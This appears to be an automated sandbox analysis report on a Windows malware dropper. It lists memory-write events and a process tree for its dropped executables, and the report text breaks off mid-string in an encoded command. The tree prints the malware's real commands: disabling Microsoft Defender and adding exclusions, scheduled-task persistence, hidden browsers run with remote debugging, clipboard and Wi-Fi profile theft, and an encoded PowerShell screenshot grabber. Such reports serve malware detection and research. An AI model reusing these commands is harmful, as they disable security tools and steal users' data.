pid Process 1188 svchost.exe 5024 ipscan.exe 5024 ipscan.exe 8656 XClient.exe 4572 chrome.exe 1608 chrome.exe 4376 x.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5048 wrote to memory of 984 5048 4363463463464363463463463.exe 78 PID 5048 wrote to memory of 984 5048 4363463463464363463463463.exe 78 PID 5048 wrote to memory of 984 5048 4363463463464363463463463.exe 78 PID 984 wrote to memory of 2316 984 cluton.exe 79 PID 984 wrote to memory of 2316 984 cluton.exe 79 PID 984 wrote to memory of 2316 984 cluton.exe 79 PID 984 wrote to memory of 2316 984 cluton.exe 79 PID 5048 wrote to memory of 2960 5048 4363463463464363463463463.exe 80 PID 5048 wrote to memory of 2960 5048 4363463463464363463463463.exe 80 PID 5048 wrote to memory of 1188 5048 4363463463464363463463463.exe 81 PID 5048 wrote to memory of 1188 5048 4363463463464363463463463.exe 81 PID 2960 wrote to memory of 4908 2960 main1.exe 82 PID 2960 wrote to memory of 4908 2960 main1.exe 82 PID 4908 wrote to memory of 3928 4908 main1.exe 83 PID 4908 wrote to memory of 3928 4908 main1.exe 83 PID 4908 wrote to memory of 760 4908 main1.exe 86 PID 4908 wrote to memory of 760 4908 main1.exe 86 PID 760 wrote to memory of 4832 760 chrome.exe 87 PID 760 wrote to memory of 4832 760 chrome.exe 87 PID 760 wrote to memory of 2716 760 chrome.exe 88 PID 760 wrote to memory of 2716 760 chrome.exe 88 PID 760 wrote to memory of 992 760 chrome.exe 89 PID 760 wrote to memory of 992 760 chrome.exe 89 PID 760 wrote to memory of 3528 760 chrome.exe 90 PID 760 wrote to memory of 3528 760 chrome.exe 90 PID 760 wrote to memory of 2804 760 chrome.exe 92 PID 760 wrote to memory of 2804 760 chrome.exe 92 PID 760 wrote to memory of 1988 760 chrome.exe 93 PID 760 wrote to memory of 1988 760 chrome.exe 93 PID 5048 wrote to memory of 3204 5048 4363463463464363463463463.exe 91 PID 5048 wrote to memory of 3204 5048 4363463463464363463463463.exe 91 PID 3204 wrote to memory of 2332 3204 phost.exe 95 PID 3204 wrote to memory of 2332 3204 phost.exe 95 PID 5048 wrote to memory of 1984 5048 4363463463464363463463463.exe 96 PID 5048 wrote to memory of 1984 5048 4363463463464363463463463.exe 96 PID 1188 wrote to memory of 3272 1188 svchost.exe 97 PID 1188 wrote to memory of 3272 1188 svchost.exe 97 PID 2332 wrote to memory of 2380 2332 phost.exe 233 PID 2332 wrote to memory of 2380 2332 phost.exe 233 PID 2332 wrote to memory of 4008 2332 phost.exe 157 PID 2332 wrote to memory of 4008 2332 phost.exe 157 PID 2332 wrote to memory of 3264 2332 phost.exe 101 PID 2332 wrote to memory of 3264 2332 phost.exe 101 PID 2332 wrote to memory of 2272 2332 phost.exe 104 PID 2332 wrote to memory of 2272 2332 phost.exe 104 PID 2332 wrote to memory of 4924 2332 phost.exe 107 PID 2332 wrote to memory of 4924 2332 phost.exe 107 PID 5048 wrote to memory of 4332 5048 4363463463464363463463463.exe 109 PID 5048 wrote to memory of 4332 5048 4363463463464363463463463.exe 109 PID 2272 wrote to memory of 1116 2272 cmd.exe 253 PID 2272 wrote to memory of 1116 2272 cmd.exe 253 PID 4924 wrote to memory of 4088 4924 cmd.exe 111 PID 4924 wrote to memory of 4088 4924 cmd.exe 111 PID 3264 wrote to memory of 2240 3264 cmd.exe 112 PID 3264 wrote to memory of 2240 3264 cmd.exe 112 PID 2380 wrote to memory of 2820 2380 cmd.exe 247 PID 2380 wrote to memory of 2820 2380 cmd.exe 247 PID 4008 wrote to memory of 1176 4008 cmd.exe 114 PID 4008 wrote to memory of 1176 4008 cmd.exe 114 PID 2332 wrote to memory of 2476 2332 phost.exe 115 PID 2332 wrote to memory of 2476 2332 phost.exe 115 PID 2476 wrote to memory of 3688 2476 cmd.exe 255 PID 2476 wrote to memory of 3688 2476 cmd.exe 255 PID 2332 wrote to memory of 956 2332 phost.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 1076 attrib.exe 4532 attrib.exe 7672 attrib.exe 8492 attrib.exe 5532 attrib.exe 5680 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook cluton.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook cluton.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2316
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3498cc40,0x7ffd3498cc4c,0x7ffd3498cc585⤵PID:4832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2208,i,13333003684199251453,8304155136280653749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:25⤵PID:2716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1776,i,13333003684199251453,8304155136280653749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2212 /prefetch:35⤵PID:992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1840,i,13333003684199251453,8304155136280653749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:85⤵PID:3528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2804,i,13333003684199251453,8304155136280653749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2816 /prefetch:15⤵
- Uses browser remote debugging
PID:2804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2828,i,13333003684199251453,8304155136280653749,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2840 /prefetch:15⤵
- Uses browser remote debugging
PID:1988
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM msedge.exe4⤵
- Kills process with taskkill
PID:5884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:6052 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd27cd3cb8,0x7ffd27cd3cc8,0x7ffd27cd3cd85⤵PID:6076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,15761982950429721462,13559684288373445781,131072 --no-sandbox --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1960 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,15761982950429721462,13559684288373445781,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1988 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,15761982950429721462,13559684288373445781,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2560 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1948,15761982950429721462,13559684288373445781,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:5276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1948,15761982950429721462,13559684288373445781,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:15⤵
- Uses browser remote debugging
- Suspicious behavior: EnumeratesProcesses
PID:5352
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"C:\Users\Admin\AppData\Local\Temp\Files\phost.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\phost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""4⤵
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"5⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
- Suspicious use of WriteProcessMemory
PID:2476 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵PID:3688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵PID:956
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:1032
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:3504
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵PID:1952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:4424
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1928
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:4644
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:3616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1032
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1108
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:3980
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1488 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:1296
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAG